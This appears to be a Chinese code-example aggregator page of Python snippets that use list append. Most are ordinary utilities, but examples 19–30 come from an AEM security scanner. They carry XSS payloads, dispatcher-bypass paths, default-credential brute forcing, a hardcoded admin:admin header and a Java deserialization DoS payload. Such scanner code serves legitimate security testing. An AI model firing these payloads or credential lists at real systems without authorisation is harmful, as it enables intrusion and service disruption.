Python源码示例:concurrent.futures.append()

示例1
def paralelize(
    objects: Sequence[Any],
    worker: Callable[[Sequence[Any]], Any],
    max_threads: int = 10,
) -> Sequence[concurrent.futures.Future]:
    """Paralelize tasks using connector on list of URLS.

    URLs are split into up-to num_threads chunks and each chunk is processed
    in its own thread. Connectors in worker method MUST be duplicated to ensure
    thread safety.

    :returns: collection of instance of Future objects, each one corresponding
        to one thread. It is caller responsibility to check if threads have
        finished successfully.
    """
    number_of_chunks = min(len(objects), max_threads)
    objects_chunks = chunks(objects, number_of_chunks)

    futures = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
        for objects_chunk in objects_chunks:
            futures.append(executor.submit(worker, objects_chunk))
    return futures 
示例2
def append(self, resultFile, resultElem, all_columns=False):
        """
        Append the result for one run. Needs to be called before collect_data().
        """
        self._xml_results += [
            (result, resultFile) for result in _get_run_tags_from_xml(resultElem)
        ]
        for attrib, values in RunSetResult._extract_attributes_from_result(
            resultFile, resultElem
        ).items():
            self.attributes[attrib].extend(values)

        if not self.columns:
            self.columns = RunSetResult._extract_existing_columns_from_result(
                resultFile, resultElem, all_columns
            ) 
示例3
def insert_logfile_names(resultFile, resultElem):
    # get folder of logfiles (truncate end of XML file name and append .logfiles instead)
    log_folder = resultFile[0 : resultFile.rfind(".results.")] + ".logfiles/"

    # append begin of filename
    runSetName = resultElem.get("name")
    if runSetName is not None:
        blockname = resultElem.get("block")
        if blockname is None:
            log_folder += runSetName + "."
        elif blockname == runSetName:
            pass  # real runSetName is empty
        else:
            assert runSetName.endswith("." + blockname)
            runSetName = runSetName[: -(1 + len(blockname))]  # remove last chars
            log_folder += runSetName + "."

    # for each file: append original filename and insert log_file_name into sourcefileElement
    for sourcefile in _get_run_tags_from_xml(resultElem):
        if "logfile" in sourcefile.attrib:
            log_file = urllib.parse.urljoin(resultFile, sourcefile.get("logfile"))
        else:
            log_file = log_folder + os.path.basename(sourcefile.get("name")) + ".log"
        sourcefile.set("logfile", log_file) 
示例4
def serve(self):
        try:
            token, key, value = self.path.split('/')[1:4]
        except:
            self.send_response(200)
            return

        if self.token != token:
            self.send_response(200)
            return

        if key in self.d:
            self.d[key].append(value)
        else:
            self.d[key] = [value, ]

        self.send_response(200) 
示例5
def get_chapters(self, chapter_object):
        """Queries the series details API and creates a chapter object for each
        chapter listed.
        """
        response = requests.get(self.api_hook_details).json()
        chapters = []
        for chapter in response['chapters']:
            if int(chapter['chapter']['subchapter']) > 0:
                chapter_number = '.'.join([chapter['chapter']['chapter'],
                                           chapter['chapter']['subchapter']])
            else:
                chapter_number = chapter['chapter']['chapter']
            kwargs = {
                'name': self.name,
                'alias': self.alias,
                'chapter': chapter_number,
                'api_id': chapter['chapter']['id'],
                'url': chapter['chapter']['href'],
                'title': chapter['chapter']['name'],
                'groups': [team['name'] for team in chapter['teams']]
            }
            chapter = chapter_object(**kwargs)
            chapters.append(chapter)
        return chapters 
示例6
def get_chapters(self):
        chapters = []
        for t in self.json['taggings']:
            if 'permalink' in t and 'title' in t:
                name_parts = re.search(name_re, t['title'])
                if not name_parts:
                    name_parts = re.search(fallback_re, t['title'])
                    chapter = name_parts.group('num')
                elif name_parts.group('type') == 'Special':
                    chapter = 'Special ' + name_parts.group('num')
                else:
                    chapter = name_parts.group('num')
                title = name_parts.group('title')
                url = urljoin('https://dynasty-scans.com/chapters/',
                              t['permalink'])
                c = DynastyScansChapter(name=self.name, alias=self.alias,
                                        chapter=chapter, url=url, title=title)
                chapters.append(c)
        return chapters 
示例7
def latest(alias, relative):
    """List most recent chapter addition for series."""
    query = db.session.query(db.Series)
    if alias:
        query = query.filter_by(following=True, alias=alias)
    else:
        query = query.filter_by(following=True)
    query = query.order_by(db.Series.alias).all()
    updates = []
    for series in query:
        if series.last_added is None:
            time = 'never'
        elif relative:
            time = utility.time_to_relative(series.last_added)
        else:
            time = series.last_added.strftime('%Y-%m-%d %H:%M')
        updates.append((series.alias, time))
    output.even_columns(updates, separator_width=3) 
示例8
def main(_):
  tf_config = os.environ.get('TF_CONFIG', None)
  logging.info(tf_config)
  config = json.loads(tf_config)
  job_type = config.get('task', {}).get('type')
  os.environ.update({'PYTHONPATH': '/'})
  executor = concurrent.futures.ThreadPoolExecutor(
      max_workers=FLAGS.actors_per_worker)
  futures = []
  if job_type == 'master':
    futures.append(run_learner(executor, config))
  else:
    assert job_type == 'worker', 'Unexpected task type: {}'.format(job_type)
    for actor_id in range(FLAGS.actors_per_worker):
      futures.append(run_actor(executor, config, actor_id))
  for f in futures:
    f.result() 
示例9
def _get_paginated_response(self, url, params=None):
        url = self.add_slash(url)
        response_data = self._get_first_page(url, params)
        count = response_data.get('count', 0)
        page_count = int(math.ceil(float(count) / PAGINATION_LIMIT))
        self._logger.debug('Calculated that there are {} pages to get'.format(page_count))
        for result in response_data.get('results', []):
            yield result
        if page_count:
            with concurrent.futures.ThreadPoolExecutor(max_workers=25) as executor:
                futures = []
                if not params:
                    params = {}
                for index in range(page_count, 1, -1):
                    params.update({'page': index})
                    futures.append(executor.submit(self.session.get, url, params=params.copy()))
                for future in concurrent.futures.as_completed(futures):
                    try:
                        response = future.result()
                        response_data = response.json()
                        response.close()
                        for result in response_data.get('results'):
                            yield result
                    except Exception:  # pylint: disable=broad-except
                        self._logger.exception('Future failed...') 
示例10
def get_urls(inputfiles):
    """
    This function takes as input the list of files containing the hostnames
    and normalizes the format of the hostnames in order to be able to perform
    valid HTTP/HTTPS requests.

    Args:
    inputfiles -- list of inputfiles

    Returns:
    urls       -- list of normalized URLs which can be queries
    """
    urls = []
    scheme_rgx = re.compile(r'^https?://')
    for ifile in inputfiles:
        urls.append(ifile.read().splitlines())
    urls = set([n for l in urls for n in l])
    urls = list(filter(None, urls))
    for i in range(len(urls)):
        if not scheme_rgx.match(urls[i]):
            urls[i] = 'http://' + urls[i]
    return urls 
示例11
def new_check(self):
        c = Check()
        self.checks.append(c)
        return c 
示例12
def handle_union_tag(
    tag, table_definition_file, options, default_columns, columns_relevant_for_diff
):
    columns = (
        extract_columns_from_table_definition_file(tag, table_definition_file)
        or default_columns
    )
    result = RunSetResult([], collections.defaultdict(list), columns)
    all_result_files = set()

    for resultTag in tag.findall("result"):
        if extract_columns_from_table_definition_file(resultTag, table_definition_file):
            logging.warning(
                "<result> tags within <union> tags may not contain <column> tags, "
                "these column declarations will be ignored. Please move them to the <union> tag."
            )
        run_set_id = resultTag.get("id")
        for resultsFile in get_file_list_from_result_tag(
            resultTag, table_definition_file
        ):
            if resultsFile in all_result_files:
                handle_error("File '%s' included twice in <union> tag", resultsFile)
            all_result_files.add(resultsFile)
            result_xml = parse_results_file(resultsFile, run_set_id)
            if result_xml is not None:
                result.append(resultsFile, result_xml, options.all_columns)

    if not result._xml_results:
        return None

    name = tag.get("name")
    if name:
        logging.warning(
            "Attribute 'name' for <union> tags is deprecated, use 'title' instead."
        )
    name = tag.get("title", name)
    if name:
        result.attributes["name"] = [name]
    result.collect_data(options.correct_only)
    return result 
示例13
def extract_columns_from_table_definition_file(xmltag, table_definition_file):
    """
    Extract all columns mentioned in the result tag of a table definition file.
    """

    def handle_path(path):
        """Convert path from a path relative to table-definition file."""
        if not path or path.startswith("http://") or path.startswith("https://"):
            return path
        return os.path.join(os.path.dirname(table_definition_file), path)

    columns = []
    for c in xmltag.findall("column"):
        scale_factor = c.get("scaleFactor")
        display_unit = c.get("displayUnit")
        source_unit = c.get("sourceUnit")

        new_column = Column(
            c.get("title"),
            c.text,
            c.get("numberOfDigits"),
            handle_path(c.get("href")),
            None,
            display_unit,
            source_unit,
            scale_factor,
            c.get("relevantForDiff"),
            c.get("displayTitle"),
        )
        columns.append(new_column)

    return columns 
示例14
def collect_data(self, correct_only):
        """
        Load the actual result values from the XML file and the log files.
        This may take some time if many log files have to be opened and parsed.
        """
        self.results = []

        def get_value_from_logfile(lines, identifier):
            """
            This method searches for values in lines of the content.
            It uses a tool-specific method to so.
            """
            return load_tool(self).get_value_from_output(lines, identifier)

        # Opening the ZIP archive with the logs for every run is too slow, we cache it.
        log_zip_cache = {}
        try:
            for xml_result, result_file in self._xml_results:
                self.results.append(
                    RunResult.create_from_xml(
                        xml_result,
                        get_value_from_logfile,
                        self.columns,
                        correct_only,
                        log_zip_cache,
                        self.columns_relevant_for_diff,
                        result_file,
                    )
                )
        finally:
            for file in log_zip_cache.values():
                file.close()

        for column in self.columns:
            column_values = (
                run_result.values[run_result.columns.index(column)]
                for run_result in self.results
            )
            column.set_column_type_from(column_values)

        del self._xml_results 
示例15
def merge_task_lists(runset_results, tasks):
    """
    Set the filelists of all RunSetResult elements so that they contain the same files
    in the same order. For missing files a dummy element is inserted.
    """
    for runset in runset_results:
        # create mapping from id to RunResult object
        # Use reversed list such that the first instance of equal tasks end up in dic
        dic = {
            run_result.task_id: run_result for run_result in reversed(runset.results)
        }
        runset.results = []  # clear and repopulate results
        for task in tasks:
            run_result = dic.get(task)
            if run_result is None:
                logging.info("    No result for task %s in '%s'.", task, runset)
                # create an empty dummy element
                run_result = RunResult(
                    task,
                    None,
                    "empty",  # special category for tables
                    None,
                    None,
                    runset.columns,
                    [None] * len(runset.columns),
                )
            runset.results.append(run_result) 
示例16
def get_rows(runSetResults):
    """
    Create list of rows with all data. Each row consists of several RunResults.
    """
    rows = []
    for task_results in zip(*[runset.results for runset in runSetResults]):
        rows.append(Row(task_results))

    return rows 
示例17
def select_relevant_id_columns(rows):
    """
    Find out which of the entries in Row.id are equal for all given rows.
    @return: A list of True/False values according to whether the i-th part of the id is always equal.
    """
    relevant_id_columns = [True]  # first column (file name) is always relevant
    if rows:
        prototype_id = rows[0].id
        for column in range(1, len(prototype_id)):

            def id_equal_to_prototype(row):
                return row.id[column] == prototype_id[column]

            relevant_id_columns.append(not all(map(id_equal_to_prototype, rows)))
    return relevant_id_columns 
示例18
def _PredictOneCheckpoint(self, checkpoint, output_dir):
    """Runs predictor."""
    tf.logging.info('Processing checkpoint %s.', checkpoint)
    self._predictor.Load(checkpoint)

    def LockedRunBatch(batch, batch_id):
      """TPU inference runs the i-th batch on the i%num_cores-th core.

      Make sure that core is available before scheduling the next batch on it.

      Args:
        batch: The input to be passed to RunBatch.
        batch_id: The id of this batch, which determins which core it runs on.
      """
      with self._locks[batch_id % len(self._locks)]:
        self.RunBatch(output_dir, batch)

    batch_id = 0
    batch = []
    futures = []
    # Iterate through the input and process it one batch at a time.
    it = self.InputGenerator()
    if self._max_inputs > 0:
      it = itertools.islice(it, self._max_inputs)
    for next_id, element in enumerate(it):
      if self._ShouldProcessInputId(next_id):
        batch.append((next_id, element))
        if len(batch) == self._batch_size:
          futures.append(
              self._threadpool.submit(LockedRunBatch, batch, batch_id))
          batch_id += 1
          batch = []
    # Last batch.
    if batch:
      futures.append(self._threadpool.submit(LockedRunBatch, batch, batch_id))
    # Wait for completion.
    for f in futures:
      f.result() 
示例19
def exposed_set_preferences(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    SETPREFERENCES = itertools.product(('/crx/de/setPreferences.jsp', '///crx///de///setPreferences.jsp'),
                                   (';%0a{0}.html', '/{0}.html'),
                                   ('?keymap=<1337>&language=0',))
    SETPREFERENCES = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in SETPREFERENCES)

    results = []

    for path in SETPREFERENCES:
        url = normalize_url(base_url, path)

        try:
            resp = http_request(url, proxy=proxy)

            if resp.status_code == 400:
                if '<1337>' in resp.content.decode():
                    f = Finding('SetPreferences', url,
                                'Page setPreferences.jsp is exposed, XSS might be possible via keymap parameter.')

                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_set_preferences', url=url)

    return results 
示例20
def exposed_merge_metadata(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    MERGEMETADATA = itertools.product(('/libs/dam/merge/metadata', '///libs///dam///merge///metadata'),
                                   ('.html', '.css/{0}.html', '.ico/{0}.html', '....4.2.1....json/{0}.html',
                                    '.css;%0a{0}.html', '.ico;%0a{0}.html'),
                                   ('?path=/etc&.ico',))
    MERGEMETADATA = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in MERGEMETADATA)

    results = []

    for path in MERGEMETADATA:
        url = normalize_url(base_url, path)

        try:
            resp = http_request(url, proxy=proxy)

            if resp.status_code == 200:
                try:
                    json.loads(resp.content.decode())['assetPaths']
                except:
                    pass
                else:
                    f = Finding('MergeMetadataServlet', url,
                                'MergeMetadataServlet is exposed, XSS might be possible via path parameter.')

                    results.append(f)
                    break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_merge_metadata', url=url)

    return results 
示例21
def exposed_get_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    GETSERVLET = itertools.product(('/', '/etc', '/var', '/apps', '/home', '///etc', '///var', '///apps', '///home'),
                                   ('', '.children'),
                                   ('.json', '.1.json', '....4.2.1....json', '.json?{0}.css', '.json?{0}.ico', '.json?{0}.html',
                                   '.json/{0}.css', '.json/{0}.html', '.json/{0}.png', '.json/{0}.ico',
                                   '.json;%0a{0}.css', '.json;%0a{0}.png', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
    GETSERVLET = list('{0}{1}{2}'.format(p1, p2, p3.format(r)) for p1, p2, p3 in GETSERVLET)

    results = []

    for path in GETSERVLET:
        url = normalize_url(base_url, path)

        try:
            resp = http_request(url, proxy=proxy)

            if resp.status_code == 200:
                try:
                    json.loads(resp.content.decode())
                    if not 'jcr:primaryType' in resp.content.decode():
                        raise Exception()
                except:
                    pass
                else:
                    f = Finding('DefaultGetServlet', url,
                                'Sensitive information might be exposed via AEM\'s DefaultGetServlet. '
                                'Check child nodes manually for secrets exposed, see - '
                                'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43')

                    results.append(f)
        except:
            if debug:
                error('Exception while performing a check', check='exposed_get_servlet', url=url)

    return results 
示例22
def exposed_post_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    POSTSERVLET = itertools.product(('/', '/content', '/content/dam'),
                                    ('.json', '.1.json', '...4.2.1...json', '.json/{0}.css', '.json/{0}.html',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html'))
    POSTSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in POSTSERVLET)

    results = []
    for path in POSTSERVLET:
        url = normalize_url(base_url, path)
        try:
            data = ':operation=nop'
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'Null Operation Status:' in str(resp.content):
                f = Finding('POSTServlet', url,
                            'POSTServlet is exposed, persistent XSS or RCE might be possible, it depends on your privileges.')
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_post_servlet', url=url)

    return results 
示例23
def create_new_nodes2(base_url, my_host, debug=False, proxy=None):
    CREDS = ('author:author', 'grios:password', 'aparker@geometrixx.info:aparker', 'jdoe@geometrixx.info:jdoe',
             'james.devore@spambob.com:password', 'matt.monroe@mailinator.com:password',
             'aaron.mcdonald@mailinator.com:password', 'jason.werner@dodgit.com:password')

    nodename = random_string()
    r = random_string(3)
    POSTSERVLET = itertools.product(('/home/users/geometrixx/{0}/', ),
                                    ('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
                                     '{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
                                     '{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
                                     '{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico',
                                     '{0}....4.2.1....json', '{0}?{1}.ico', '{0}?{1}.css',
                                     '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
                                     '{0}?{1}....4.2.1....json'))
    POSTSERVLET = list('{0}{1}'.format(p1, p2.format(nodename, r)) for p1, p2 in POSTSERVLET)

    results = []
    for path, creds in itertools.product(POSTSERVLET, CREDS):
        path = path.format(creds.split(':')[0])
        url = normalize_url(base_url, path)
        try:
            headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
                       'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
            data = 'a=b'
            resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)

            if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
                f = Finding('CreateJCRNodes 2', url,
                            'It\'s possible to create new JCR nodes using POST Servlet. As Geometrixx user "{0}". '
                            'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.'.format(creds))
                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='create_new_nodes2', url=url)

    return results 
示例24
def exposed_loginstatus_servlet(base_url, my_host, debug=False, proxy=None):
    global CREDS

    r = random_string(3)
    LOGINSTATUS = itertools.product(('/system/sling/loginstatus', '///system///sling///loginstatus'),
                                    ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json/{0}.1.json',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.png',
                                     '.json;%0a{0}.ico', '...4.2.1...json'))
    LOGINSTATUS = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in LOGINSTATUS)

    results = []
    for path in LOGINSTATUS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'authenticated=' in str(resp.content):
                f = Finding('LoginStatusServlet', url,
                            'LoginStatusServlet is exposed, it allows to bruteforce credentials. '
                            'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)

                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)

                    if 'authenticated=true' in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)

                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_loginstatus_servlet', url=url)

    return results


#@register('currentuser_servlet') 
示例25
def exposed_userinfo_servlet(base_url, my_host, debug=False, proxy=None):
    global CREDS

    r = random_string(3)
    USERINFO = itertools.product(('/libs/cq/security/userinfo', '///libs///cq///security///userinfo'),
                                    ('.json', '.css', '.ico', '.png', '.gif', '.html', '.js',
                                     '.json?{0}.css', '.json/{0}.1.json',
                                     '.json;%0a{0}.css', '.json;%0a{0}.html',
                                     '.json;%0a{0}.ico', '...4.2.1...json'))

    USERINFO = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in USERINFO)

    results = []
    for path in USERINFO:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'userID' in str(resp.content):
                f = Finding('UserInfoServlet', url,
                    'UserInfoServlet is exposed, it allows to bruteforce credentials. '
                    'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
                results.append(f)

                for creds in CREDS:
                    headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
                    resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)

                    if 'anonymous' not in str(resp.content):
                        f = Finding('AEM with default credentials', url,
                                    'AEM with default credentials "{0}".'.format(creds))
                        results.append(f)

                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_userinfo_servlet', url=url)

    return results 
示例26
def exposed_felix_console(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    FELIXCONSOLE = itertools.product(('/system/console/bundles', '///system///console///bundles'),
                                    ('', '.json', '.1.json', '.4.2.1...json', '.css', '.ico', '.png', '.gif', '.html', '.js',
                                     ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.png', '.json;%0a{0}.ico', '.servlet/{0}.css',
                                     '.servlet/{0}.js', '.servlet/{0}.html', '.servlet/{0}.ico'))
    FELIXCONSOLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FELIXCONSOLE)

    results = []
    for path in FELIXCONSOLE:
        url = normalize_url(base_url, path)
        headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
        try:
            resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'Web Console - Bundles' in str(resp.content):
                f = Finding('FelixConsole', url,
                            'Felix Console is exposed, you may get RCE by installing OSGI bundle. '
                            'See - https://github.com/0ang3el/aem-rce-bundle')
                results.append(f)

                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_felix_console', url=url)

    return results 
示例27
def exposed_wcmdebug_filter(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    WCMDEBUG = itertools.product(('/', '/content', '/content/dam'),
                                 ('.json', '.1.json', '...4.2.1...json', '.json/{0}.css',
                                  '.json/{0}.html', '.json/{0}.ico', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'),
                                 ('?debug=layout',))
    WCMDEBUG = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMDEBUG)

    results = []
    for path in WCMDEBUG:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and 'res=' in str(resp.content) and 'sel=' in str(resp.content):
                f = Finding('WCMDebugFilter', url,
                            'WCMDebugFilter exposed and might be vulnerable to reflected XSS (CVE-2016-7882). '
                            'See - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c')

                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_wcmdebug_filter', url=url)

    return results 
示例28
def exposed_wcmsuggestions_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    WCMSUGGESTIONS = itertools.product(('/bin/wcm/contentfinder/connector/suggestions', '///bin///wcm///contentfinder///connector///suggestions'),
                                       ('.json', '.css', '.html', '.ico', '.png', '.gif', '.json/{0}.1.json',
                                        '.json;%0a{0}.css', '.json/{0}.css', '.json/{0}.ico',
                                        '.json/{0}.html', '...4.2.1...json'),
                                       ('?query_term=path%3a/&pre=<1337abcdef>&post=yyyy',))
    WCMSUGGESTIONS = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMSUGGESTIONS)

    results = []
    for path in WCMSUGGESTIONS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            if resp.status_code == 200 and '<1337abcdef>' in str(resp.content):
                f = Finding('WCMSuggestionsServlet', url,
                            'WCMSuggestionsServlet exposed and might result in reflected XSS. '
                            'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96')

                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='exposed_wcmsuggestions_servlet', url=url)

    return results 
示例29
def swf_xss(base_url, my_host, debug=False, proxy=None):
    SWFS = (
        '/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=javascript:confirm(document.domain)',
        '/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf.res?onclick=javascript:confirm(document.domain)',
        '/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
        '/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf.res?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
        '/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String',
        '/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf.res?javascriptCallbackFunction=alert(document.domain)-String',
        '/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/dam/widgets/resources/swfupload/swfupload_f9.swf.res?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/libs/cq/ui/resources/swfupload/swfupload.swf.res?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
        '/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window',
        '/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window',
        '/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
        '/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf.res?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
        '/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window',
        '/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window'
    )

    results = []
    for path in SWFS:
        url = normalize_url(base_url, path)
        try:
            resp = http_request(url, proxy=proxy, debug=debug)

            ct = content_type(resp.headers.get('Content-Type', ''))
            cd = resp.headers.get('Content-Disposition', '')
            if resp.status_code == 200 and ct == 'application/x-shockwave-flash' and not cd:
                f = Finding('Reflected XSS via SWF', url,
                            'AEM exposes SWF that might be vulnerable to reflected XSS. '
                            'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=61')

                results.append(f)
        except:
            if debug:
                error('Exception while performing a check', check='swf_xss', url=url)

    return results 
示例30
def deser_externaljob_servlet(base_url, my_host, debug=False, proxy=None):
    r = random_string(3)

    DESERPAYLOAD = base64.b64decode('rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=')  # Generated with oisdos - java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap

    EXTERNALJOBSERVLET = itertools.product(('/libs/dam/cloud/proxy', '///libs///dam///cloud///proxy'),
                                           ('.json', '.css', '.js', '.html', '.ico', '.png', '.gif', '.1.json',
                                            '...4.2.1...json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
    EXTERNALJOBSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in EXTERNALJOBSERVLET)


    results = []
    for path in EXTERNALJOBSERVLET:
        url = normalize_url(base_url, path)
        data = {':operation': ('', 'job'), 'file': ('jobevent', DESERPAYLOAD, 'application/octet-stream')}
        headers = {'Referer': base_url}
        try:
            resp = http_request_multipart(url, data=data, additional_headers=headers, proxy=proxy, debug=debug)

            if resp.status_code == 500 and 'Java heap space' in str(resp.content):
                f = Finding('ExternalJobServlet', url,
                            'ExternalJobServlet is vulnerable to Java untrusted data deserialization. '
                            'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=102')

                results.append(f)
                break
        except:
            if debug:
                error('Exception while performing a check', check='deser_externaljob_servlet', url=url)

    return results